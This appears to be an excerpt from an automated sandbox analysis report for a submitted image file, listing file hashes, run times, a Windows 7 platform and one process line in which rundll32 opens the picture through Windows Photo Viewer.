| SHA1 | ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d |
| SHA256 | c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8 |
| SHA512 | 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 06:38
Reported
2024-06-15 06:41
Platform
win7-20240508-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Processes
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen "C:\Users\Admin\AppData\Local\Temp\Ramo 🖤.jpg"